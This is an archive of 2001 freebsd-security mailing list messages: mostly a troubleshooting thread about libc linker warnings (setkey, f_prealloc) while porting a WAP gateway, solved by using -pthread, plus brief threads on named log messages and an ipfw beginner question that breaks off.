12:39:46 +0200 (CEST) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.3/8.11.3) with ESMTP id f49AdSP95800; Wed, 9 May 2001 12:39:28 +0200 (CEST) (envelope-from pherman@frenchfries.net) Date: Wed, 9 May 2001 12:39:28 +0200 (CEST) From: Paul Herman To: Rasputin Cc: Subject: Re: setkey(3) not present in the system In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 May 2001, Rasputin wrote: > Anybody know where I can get these functions? > Thanks. > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > /usr/lib/libc.so: warning: this program uses gets(), which is unsafe. > /usr/lib/libc.so: warning: mktemp() possibly used unsafely; consider using mkstemp() > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > /usr/lib/libc.so: warning: tmpnam() possibly used unsafely; consider using mkstemp() > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid. > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! Just follow your nose, it always knows! :-) des_setkey(3) manpage mentions -lcipher. Looks like it's in /usr/src/secure/lib/libcipher -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 3:49:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from serenity.mcc.ac.uk (serenity.mcc.ac.uk [130.88.200.93]) by hub.freebsd.org (Postfix) with ESMTP id 2EF3F37B422 for ; Wed, 9 May 2001 03:49:10 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by serenity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14xRWm-000HnE-00; Wed, 9 May 2001 11:49:08 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f49An7c49121; Wed, 9 May 2001 11:49:07 +0100 (BST) (envelope-from rasputin) Date: Wed, 9 May 2001 11:49:07 +0100 From: Rasputin To: Paul Herman Cc: security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509114907.A48960@dogma.freebsd-uk.eu.org> Reply-To: Rasputin References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from pherman@frenchfries.net on Wed, May 09, 2001 at 12:39:28PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Paul Herman [010509 11:41]: > On Wed, 9 May 2001, Rasputin wrote: > > > Anybody know where I can get these functions? > > Thanks. > > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! > Just follow your nose, it always knows! :-) > des_setkey(3) manpage mentions -lcipher. Looks like it's in If you could see the size of my nose, you'd be even more amazed I missed this.. Someone else mentioned -lcipher, I'll throw that in and give it a whirl. Thanks. Incidentally, (and OT-ly), this is my favourite error message... > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid. -- Things will be bright in P.M. A cop will shine a light in your face. Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 3:51:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4BAD637B422 for ; Wed, 9 May 2001 03:51:24 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 44307 invoked by uid 1000); 9 May 2001 10:50:52 -0000 Date: Wed, 9 May 2001 13:50:52 +0300 From: Peter Pentchev To: Rasputin Cc: security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509135052.A44191@ringworld.oblivion.bg> Mail-Followup-To: Rasputin , security@freebsd.org References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 10:43:13AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 09, 2001 at 10:43:13AM +0100, Rasputin wrote: > > Morning all. > I'm trying to port a WAP gateway to BSD, I've managed to get it to roll > a binary, but want to quench these warnings before I submit it. > (see bottom) > > I know how to sort out mktemp() and gets(), anyone know where f_prealloc() > lives? [roam@ringworld:v0 /usr/lib]$ nm -ao *.a | fgrep f_prealloc libc.a:findfp.o:00000154 T f_prealloc libc_p.a:findfp.po:00000160 T f_prealloc libc_pic.a:findfp.So:00000180 T f_prealloc libc_r.a:findfp.o:00000160 T f_prealloc libc_r_p.a:findfp.po:0000016c T f_prealloc [roam@ringworld:v0 /usr/lib]$ Looks like it's in libc. The /usr/src/lib/libc/stdio/findfp.c file, though, contains comments which seem to indicate that f_prealloc() is an internal stdio function, not intended to be used by anything other than stdio. > Anyway, the main reason I mailed this list is the 4 crypto functions > don't seem to be implemented on my box - is that just me? > If so, how do I get them into the c library? > I'm not a USA resident , and used to have a line saying that in make.conf back in > 4.0-RELEASE. Since then I've removed the line. > > Anybody know where I can get these functions? Ever tried man 3 setkey? :) It mentions the "FreeSec Crypt Library (libcipher, -lcipher)" as the very first thing after the function name :) G'luck, Peter -- This would easier understand fewer had omitted. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 3:53:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id DC49F37B422 for ; Wed, 9 May 2001 03:53:48 -0700 (PDT) (envelope-from roam@ringworld.nanolink.com) Received: (qmail 44369 invoked by uid 1000); 9 May 2001 10:53:18 -0000 Date: Wed, 9 May 2001 13:53:18 +0300 From: Peter Pentchev To: Rasputin Cc: Paul Herman , security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509135318.B44191@ringworld.oblivion.bg> Mail-Followup-To: Rasputin , Paul Herman , security@freebsd.org References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509114907.A48960@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 11:49:07AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 09, 2001 at 11:49:07AM +0100, Rasputin wrote: > * Paul Herman [010509 11:41]: > > On Wed, 9 May 2001, Rasputin wrote: > > > > > Anybody know where I can get these functions? > > > Thanks. > > > > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! > > > Just follow your nose, it always knows! :-) > > des_setkey(3) manpage mentions -lcipher. Looks like it's in > > If you could see the size of my nose, you'd be even more amazed I missed this.. > Someone else mentioned -lcipher, I'll throw that in and give it a whirl. > > Thanks. > > Incidentally, (and OT-ly), this is my favourite error message... > > > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid. The fact that the message sounds interesting is quite OT; however, the fact that it states could be quite important - see my other e-mail on the subject. It seems that the writers of the WAP gateway in question are trying to do something in a way too smart for their own good.. /me shudders at the memory of the recent -current stdio internals change, and the horrible fate of programs that assumed too much.. G'luck, Peter -- This sentence no verb. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 4:16:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from sol.serv.u-szeged.hu (sol.serv.u-szeged.hu [160.114.51.3]) by hub.freebsd.org (Postfix) with ESMTP id F3E4837B422 for ; Wed, 9 May 2001 04:16:09 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.serv.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id NAA17159; Wed, 9 May 2001 13:16:05 +0200 (MEST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 14xRwp-0006Y9-00 for ; Wed, 09 May 2001 13:16:03 +0200 Date: Wed, 9 May 2001 13:16:03 +0200 From: Szilveszter Adam To: security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509131603.D18390@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , security@freebsd.org References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 10:43:13AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 09, 2001 at 10:43:13AM +0100, Rasputin wrote: > > Morning all. > I'm trying to port a WAP gateway to BSD, I've managed to get it to roll > a binary, but want to quench these warnings before I submit it. > (see bottom) Although I am far from a programming nose (hm:-) I remember these warnings when you link against libc like this: -lc. This is not needed in my experience anyway, but seems to be required on some other UNIX platforms. On FreeBSD, you don't need the -lc. (or -lC or other variants thereof. I could find an interesting sampler in the Mozilla PSM code not long ago...) Of course, just my HUF 0.02... -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 4:21:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id 8EDA137B423 for ; Wed, 9 May 2001 04:21:08 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 15C18678BA; Wed, 9 May 2001 04:21:08 -0700 (PDT) Date: Wed, 9 May 2001 04:21:07 -0700 From: Kris Kennaway To: Peter Pentchev Cc: Rasputin , Paul Herman , security@FreeBSD.ORG Subject: Re: setkey(3) not present in the system Message-ID: <20010509042107.A36279@xor.obsecurity.org> References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org> <20010509135318.B44191@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="a8Wt8u1KmwUX3Y2C" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509135318.B44191@ringworld.oblivion.bg>; from roam@orbitel.bg on Wed, May 09, 2001 at 01:53:18PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --a8Wt8u1KmwUX3Y2C Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, May 09, 2001 at 01:53:18PM +0300, Peter Pentchev wrote: > On Wed, May 09, 2001 at 11:49:07AM +0100, Rasputin wrote: > > * Paul Herman [010509 11:41]: > > > On Wed, 9 May 2001, Rasputin wrote: > > >=20 > > > > Anybody know where I can get these functions? > > > > Thanks. > > > > > > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > > > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > > > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > > > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! > >=20 > > > Just follow your nose, it always knows! :-) > > > des_setkey(3) manpage mentions -lcipher. Looks like it's in > >=20 > > If you could see the size of my nose, you'd be even more amazed I misse= d this.. > > Someone else mentioned -lcipher, I'll throw that in and give it a whirl. > >=20 > > Thanks.=20 > >=20 > > Incidentally, (and OT-ly), this is my favourite error message... > >=20 > > > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is s= tupid. >=20 > The fact that the message sounds interesting is quite OT; however, the fa= ct > that it states could be quite important - see my other e-mail on the subj= ect. > It seems that the writers of the WAP gateway in question are trying to do > something in a way too smart for their own good.. There's something nonstandard about the way it's linking which is triggering all of the __warn_references() in libc regardless of whether or not the code actually uses those "dangerous" functions -- I don't know what it is, but I've seen it a lot in ports. It's probably a bug which should be fixed. Kris --a8Wt8u1KmwUX3Y2C Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6+SgjWry0BWjoQKURAj9IAKCTThKcCZXFdg0ZXhlqlIeK7EY5+wCfZs2F ZBzLwmaTVSoq0eoxiJxLeeM= =6UAA -----END PGP SIGNATURE----- --a8Wt8u1KmwUX3Y2C-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 4:35:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4E23837B422 for ; Wed, 9 May 2001 04:35:26 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 44789 invoked by uid 1000); 9 May 2001 11:34:55 -0000 Date: Wed, 9 May 2001 14:34:55 +0300 From: Peter Pentchev To: Kris Kennaway Cc: Rasputin , Paul Herman , security@FreeBSD.ORG Subject: Re: setkey(3) not present in the system Message-ID: <20010509143455.C44191@ringworld.oblivion.bg> Mail-Followup-To: Kris Kennaway , Rasputin , Paul Herman , security@FreeBSD.ORG References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509114907.A48960@dogma.freebsd-uk.eu.org> <20010509135318.B44191@ringworld.oblivion.bg> <20010509042107.A36279@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010509042107.A36279@xor.obsecurity.org>; from kris@obsecurity.org on Wed, May 09, 2001 at 04:21:07AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 09, 2001 at 04:21:07AM -0700, Kris Kennaway wrote: > On Wed, May 09, 2001 at 01:53:18PM +0300, Peter Pentchev wrote: > > On Wed, May 09, 2001 at 11:49:07AM +0100, Rasputin wrote: > > > * Paul Herman [010509 11:41]: > > > > On Wed, 9 May 2001, Rasputin wrote: > > > > > > > > > Anybody know where I can get these functions? > > > > > Thanks. > > > > > > > > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > > > > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > > > > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > > > > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! > > > > > > > Just follow your nose, it always knows! :-) > > > > des_setkey(3) manpage mentions -lcipher. Looks like it's in > > > > > > If you could see the size of my nose, you'd be even more amazed I missed this.. > > > Someone else mentioned -lcipher, I'll throw that in and give it a whirl. > > > > > > Thanks. > > > > > > Incidentally, (and OT-ly), this is my favourite error message... > > > > > > > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid. > > > > The fact that the message sounds interesting is quite OT; however, the fact > > that it states could be quite important - see my other e-mail on the subject. > > It seems that the writers of the WAP gateway in question are trying to do > > something in a way too smart for their own good.. > > There's something nonstandard about the way it's linking which is > triggering all of the __warn_references() in libc regardless of > whether or not the code actually uses those "dangerous" functions -- I > don't know what it is, but I've seen it a lot in ports. It's probably > a bug which should be fixed. Nothing non-standard; the one about setkey() is triggered by just trying to resolve setkey against libc's setkey symbol; similarly for the f_prealloc() one. It's just that these warnings would never be triggered if the linker saw these symbols in another library, and saw no need to touch these particular object files within libc. As demonstrated by: [roam@ringworld:v4 ~/tmp/lc]$ cat warnings.c #include /* * bogus declaration: there is no real declaration for f_prealloc() that * we could use, and we do not really need it anyway.. */ int f_prealloc(int); void testfun(void) { setkey("key"); f_prealloc(0); } int main(int argc, char *argv[]) { return (0); } [roam@ringworld:v4 ~/tmp/lc]$ cc -o warnings warnings.c /tmp/ccys5JQh.o: In function `testfun': /tmp/ccys5JQh.o(.text+0xf): WARNING! setkey(3) not present in the system! /tmp/ccys5JQh.o(.text+0x1c): warning: this program uses f_prealloc(), which is s tupid. [roam@ringworld:v4 ~/tmp/lc]$ As you can see, simple linking triggers it. G'luck, Peter -- If I were you, who would be reading this sentence? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 4:42:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.newst.irs.ru (newst.irs.ru [212.164.94.1]) by hub.freebsd.org (Postfix) with ESMTP id 251BA37B422 for ; Wed, 9 May 2001 04:42:49 -0700 (PDT) (envelope-from fjoe@newst.net) Received: from lark.nsk.bsgdesign.com (lark.nsk.bsgdesign.com [192.168.3.21]) by mail.newst.irs.ru (8.11.1/8.11.0) with ESMTP id f49BgSK81825; Wed, 9 May 2001 18:42:34 +0700 (NOVST) (envelope-from fjoe@newst.net) Date: Wed, 9 May 2001 18:42:28 +0700 (NOVST) From: Max Khon X-Sender: fjoe@lark.nsk.bsgdesign.com To: Rasputin Cc: security@FreeBSD.ORG Subject: Re: setkey(3) not present in the system In-Reply-To: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Wed, 9 May 2001, Rasputin wrote: > Morning all. > I'm trying to port a WAP gateway to BSD, I've managed to get it to roll > a binary, but want to quench these warnings before I submit it. > (see bottom) > > I know how to sort out mktemp() and gets(), anyone know where f_prealloc() > lives? > > Anyway, the main reason I mailed this list is the 4 crypto functions > don't seem to be implemented on my box - is that just me? > If so, how do I get them into the c library? > I'm not a USA resident , and used to have a line saying that in make.conf back in > 4.0-RELEASE. Since then I've removed the line. > > Anybody know where I can get these functions? > Thanks. > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > /usr/lib/libc.so: warning: this program uses gets(), which is unsafe. > /usr/lib/libc.so: warning: mktemp() possibly used unsafely; consider using mkstemp() > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > /usr/lib/libc.so: warning: tmpnam() possibly used unsafely; consider using mkstemp() > /usr/lib/libc.so: warning: this program uses f_prealloc(), which is stupid. > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! are you sure you are not linking your binary against libc_r and libc? in FreeBSD you should use -pthread option for gcc when you want your program to be linked against libc_r /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 5: 2:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from cartman.techsupport.co.uk (cabletel1.cableol.net [194.168.3.4]) by hub.freebsd.org (Postfix) with ESMTP id E20D337B422 for ; Wed, 9 May 2001 05:02:28 -0700 (PDT) (envelope-from ceri@techsupport.co.uk) Received: from ceri by cartman.techsupport.co.uk with local (Exim 3.22 #2) id 14xShz-0004nf-00; Wed, 09 May 2001 13:04:47 +0100 Date: Wed, 9 May 2001 13:04:46 +0100 From: Ceri To: Greg Haa Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: your mail Message-ID: <20010509130446.B17977@cartman.techsupport.co.uk> References: <2BFD35C3F1F9D31185CE00B0D02023028386DA@SUNKING> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <2BFD35C3F1F9D31185CE00B0D02023028386DA@SUNKING>; from Greg.Haa@amux.com on Tue, May 08, 2001 at 01:06:06PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 08, 2001 at 01:06:06PM -0700, Greg Haa said: > Hey all. Can anyone tell me what this means? > > May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2200): > request too small > May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2201): > request too small > May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2202): > request too small It basically means that named received a packet that was too small to be a valid DNS request, so it ignored it. > I have no idea if this is even the right list or if it is a cesurity > problem. Or even security :) I have never worried about these. Ceri -- Your local RFC Nazi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 6:27:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from probity.mcc.ac.uk (probity.mcc.ac.uk [130.88.200.94]) by hub.freebsd.org (Postfix) with ESMTP id 3A7DF37B423 for ; Wed, 9 May 2001 06:27:27 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by probity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14xTzx-000JI4-00; Wed, 9 May 2001 14:27:25 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f49DROj53648; Wed, 9 May 2001 14:27:24 +0100 (BST) (envelope-from rasputin) Date: Wed, 9 May 2001 14:27:24 +0100 From: Rasputin To: Max Khon Cc: security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509142724.A53401@dogma.freebsd-uk.eu.org> Reply-To: Rasputin References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from fjoe@newst.net on Wed, May 09, 2001 at 06:42:28PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Max Khon [010509 12:46]: > hi, there! > > On Wed, 9 May 2001, Rasputin wrote: > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! > > are you sure you are not linking your binary against libc_r and libc? > in FreeBSD you should use -pthread option for gcc when you want your > program to be linked against libc_r Bingo. The command line is a right mess, cc -D_REENTRANT=1 -I. -O -pipe -march=k6 -I/usr/local/include -I/usr/local/include/libxml2 -I/usr/local/include/libxml2/libxml -o checks/check_list checks/check_list.o libgw.a libwmlscript.a libgwlib.a -lz -lm -lc_r -L/usr/local/lib -lxml2 -lz -L/usr/local/lib -lgiconv The only libpthread I have is in /usr/compat/linux/lib: rasputin@shikima kannel]$locate libpthread /usr/compat/linux/lib/libpthread-0.8.so /usr/compat/linux/lib/libpthread.so.0 - is it supposed to be in the base system? This has got less n less to do with security, and more to do with me biting off more than I can chew, now... So I'll shut up :) -- Armadillo: To provide weapons to a Spanish pickle Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 6:32: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from serenity.mcc.ac.uk (serenity.mcc.ac.uk [130.88.200.93]) by hub.freebsd.org (Postfix) with ESMTP id 55DD537B423 for ; Wed, 9 May 2001 06:31:58 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by serenity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14xU4L-0006VW-00 for security@freebsd.org; Wed, 9 May 2001 14:31:57 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f49DVuq53897 for security@freebsd.org; Wed, 9 May 2001 14:31:56 +0100 (BST) (envelope-from rasputin) Date: Wed, 9 May 2001 14:31:56 +0100 From: Rasputin To: security@freebsd.org Subject: Re: setkey(3) not present in the system Message-ID: <20010509143156.A53786@dogma.freebsd-uk.eu.org> Reply-To: Rasputin References: <20010509104313.A47276@dogma.freebsd-uk.eu.org> <20010509142724.A53401@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20010509142724.A53401@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Wed, May 09, 2001 at 02:27:24PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Rasputin [010509 14:28]: > The only libpthread I have is in /usr/compat/linux/lib: > - is it supposed to be in the base system? > So I'll shut up :) Shut up, brain. Brain, shut up. Ignore me, distinct lack of caffeine today Have now read pthread(3), and am self-larting as we speak. Thnaks for an education. :) -- You may be sure that when a man begins to call himself a "realist," he is preparing to do something he is secretly ashamed of doing. -- Sydney Harris Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 6:44:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.newst.irs.ru (newst.irs.ru [212.164.94.1]) by hub.freebsd.org (Postfix) with ESMTP id A135F37B422 for ; Wed, 9 May 2001 06:44:46 -0700 (PDT) (envelope-from fjoe@newst.net) Received: from lark.nsk.bsgdesign.com (lark.nsk.bsgdesign.com [192.168.3.21]) by mail.newst.irs.ru (8.11.1/8.11.0) with ESMTP id f49DiWK89385; Wed, 9 May 2001 20:44:33 +0700 (NOVST) (envelope-from fjoe@newst.net) Date: Wed, 9 May 2001 20:44:32 +0700 (NOVST) From: Max Khon X-Sender: fjoe@lark.nsk.bsgdesign.com To: Rasputin Cc: security@freebsd.org Subject: Re: setkey(3) not present in the system In-Reply-To: <20010509142724.A53401@dogma.freebsd-uk.eu.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Wed, 9 May 2001, Rasputin wrote: > > > /usr/lib/libc.so: WARNING! setkey(3) not present in the system! > > > /usr/lib/libc.so: WARNING! des_setkey(3) not present in the system! > > > /usr/lib/libc.so: WARNING! encrypt(3) not present in the system! > > > /usr/lib/libc.so: WARNING! des_cipher(3) not present in the system! > > > > are you sure you are not linking your binary against libc_r and libc? > > in FreeBSD you should use -pthread option for gcc when you want your > > program to be linked against libc_r > > Bingo. The command line is a right mess, > > cc -D_REENTRANT=1 -I. -O -pipe -march=k6 -I/usr/local/include -I/usr/local/include/libxml2 -I/usr/local/include/libxml2/libxml -o checks/check_list checks/check_list.o libgw.a libwmlscript.a libgwlib.a -lz -lm -lc_r -L/usr/local/lib -lxml2 -lz -L/usr/local/lib -lgiconv > > The only libpthread I have is in /usr/compat/linux/lib: > rasputin@shikima kannel]$locate libpthread > /usr/compat/linux/lib/libpthread-0.8.so > /usr/compat/linux/lib/libpthread.so.0 > > - is it supposed to be in the base system? > > This has got less n less to do with security, and more to do with > me biting off more than I can chew, now... > > So I'll shut up :) if you want threads in FreeBSD (at least in 4.x and earlier) you need to link specifying '-pthread' option for gcc. Having specified this option you will have your program linked against libc_r. Explicit -lc_r options for linking are not needed. FreeBSD 4.x does not have libpthread (all the needed functionality is contained in libc_r). /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 9 9: 5: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from c000.sfo.cp.net (c004-h012.c004.snv.cp.net [209.228.33.76]) by hub.freebsd.org (Postfix) with SMTP id 22D3237B422 for ; Wed, 9 May 2001 09:05:01 -0700 (PDT) (envelope-from msharp@medmail.com) Received: (cpmta 7233 invoked from network); 9 May 2001 09:05:00 -0700 Date: 9 May 2001 09:05:00 -0700 Message-ID: <20010509160500.7232.cpmta@c000.sfo.cp.net> X-Sent: 9 May 2001 16:05:00 GMT Received: from [66.26.118.70] by mail.medmail.com with HTTP; 09 May 2001 09:05:00 PDT Content-Type: text/plain Content-Disposition: inline Mime-Version: 1.0 To: FreeBSD-security@FreeBSD.org From: Michael Sharp X-Mailer: Web Mail 3.7.1.9 Subject: Ip filtering with ipfw Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am very new to FreeBSD, and have some questions about ipfw I compiled: options IPFIREWALL into my kernel, and added: firewall_enable="YES" in /etc/rc.conf on reboot, I see ipfiltering initializing and the default policy is to deny. After reboot, I do: ipfw list and get this: 00100 allow ip from any to any via lo0 00200 deny ip from any to 127.0.0.0/8 00300 deny ip from 127.0.0.0/8 to any 65000 allow ip from any to any 65535 deny ip from any to any which I am assuming is the defaults. Now, to keep it simple, I have a router between my internal machine ( 192.168.1.3 ) and the Internet and I set the router to allow only port 113 in to 192.168.1.3 ifconfig reveals 